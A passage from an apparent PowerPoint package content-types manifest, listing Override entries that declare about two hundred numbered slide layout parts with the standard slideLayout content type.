  <Override PartName="/ppt/slideLayouts/slideLayout1931.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1932.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1933.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1934.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1935.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1936.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1937.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1938.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1939.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout194.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1940.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1941.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1942.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1943.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1944.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1945.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1946.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1947.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1948.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1949.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout195.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1950.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1951.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1952.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1953.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1954.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1955.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1956.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1957.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1958.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1959.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout196.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1960.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1961.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1962.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1963.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1964.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1965.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1966.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1967.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1968.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1969.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout197.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1970.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1971.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1972.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1973.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1974.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1975.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1976.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1977.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1978.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1979.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout198.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1980.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1981.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1982.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1983.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1984.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1985.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1986.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1987.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1988.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1989.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout199.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1990.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1991.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1992.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1993.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1994.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1995.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1996.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1997.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1998.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout1999.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout20.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout200.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2000.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2001.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2002.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2003.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2004.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2005.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2006.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2007.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2008.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2009.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout201.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2010.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2011.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2012.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2013.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2014.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2015.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2016.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2017.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2018.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2019.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout202.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2020.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2021.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2022.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2023.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2024.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2025.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2026.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2027.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2028.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2029.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout203.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2030.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2031.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2032.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2033.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2034.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2035.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2036.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2037.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2038.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2039.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout204.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2040.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2041.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2042.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2043.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2044.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2045.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2046.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2047.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2048.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2049.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout205.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2050.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2051.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2052.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2053.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2054.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2055.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2056.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2057.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2058.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2059.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout206.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2060.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2061.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2062.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2063.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2064.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2065.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2066.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2067.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2068.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2069.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout207.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2070.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2071.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2072.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2073.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2074.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2075.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2076.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2077.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2078.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2079.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout208.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2080.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2081.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2082.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2083.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2084.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2085.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2086.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2087.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2088.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2089.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout209.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2090.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2091.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2092.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2093.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2094.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2095.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2096.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2097.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2098.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2099.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout21.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout210.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2100.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2101.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2102.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2103.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2104.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2105.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2106.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2107.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2108.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2109.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout211.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2110.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2111.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2112.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2113.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2114.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2115.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2116.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2117.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2118.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout2119.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
  <Override PartName="/ppt/slideLayouts/slideLayout212.xml" ContentType="application/vnd.openxmlformats-officedocument.presentationml.slideLayout+xml"/>
